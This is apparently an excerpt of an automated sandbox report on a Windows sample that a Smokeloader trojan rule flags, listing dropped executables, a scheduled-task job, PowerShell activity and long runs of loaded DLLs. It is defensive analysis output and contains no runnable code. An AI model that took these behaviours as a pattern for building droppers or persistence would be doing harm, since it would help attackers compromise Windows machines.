                  Source: 00000021.00000002.3298037878.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000019.00000002.3250452098.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 EntryPoint,SetErrorMode,GetVersion,lstrlenA,InitCommonControls,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,DeleteFileA,DeleteFileA,GetWindowsDirectoryA,DeleteFileA,DeleteFileA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,DeleteFileA,DeleteFileA,OleUninitialize,GetCurrentProcess,ExitWindowsEx,ExitProcess,13_2_00404375
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_00404375 EntryPoint,SetErrorMode,GetVersion,lstrlenA,InitCommonControls,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,DeleteFileA,DeleteFileA,GetWindowsDirectoryA,DeleteFileA,DeleteFileA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,DeleteFileA,DeleteFileA,OleUninitialize,GetCurrentProcess,ExitWindowsEx,ExitProcess,14_2_00404375
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeFile created: C:\Windows\Tasks\88e931437f4fbe2c.job
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00405DF012_2_00405DF0
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402D9012_2_00402D90
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004096C212_2_004096C2
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004046A112_2_004046A1
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004057D212_2_004057D2
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: String function: 00405D94 appears 38 times
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: String function: 004043B0 appears 316 times
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468
                  Source: dl7WL77rkA.exeStatic PE information: invalid certificate
                  Source: MK1r6sTJJ0KuvAGWdjimbW8H.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: IiRP3mWif0xpaQsabblBwYAE.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: PM6qM9TthMxsL1RAWEhuUNLx.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: pdCLEldSyO5Ik39YE4kJVbXN.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: XbJnQ7YPZT43Q5vvoXLuAoSq.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: Jye7PnMsJdWwQaaabqxbHITx.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: YHw4f8SZUCkdAWRXPfF1qOas.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: IpW6W2Yjx6z6D3j66j3N2tH5.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: 4xb6JU3I8UdzuT7ogqFnBL7Y.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: H7TIhgIvG1Yhal1QnwrEdA0q.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: SNePs0JIjHDOAKzI11CQ043K.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: YfSmDepXBWKsGmamEEWNYwB5.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: pxzTG78L668f3mDyeDkHXryr.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: BroomSetup.exe.13.drStatic PE information: Resource name: RT_CURSOR type: DOS executable (COM)
                  Source: BroomSetup.exe.13.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                  Source: syncUpd.exe.13.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: dl7WL77rkA.exeStatic PE information: No import functions for PE file found
                  Source: dl7WL77rkA.exe, 00000000.00000000.2001044658.000001EBAAA22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAssalamAlaikum.exe> vs dl7WL77rkA.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: webio.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: schannel.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: wininet.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: urlmon.dll
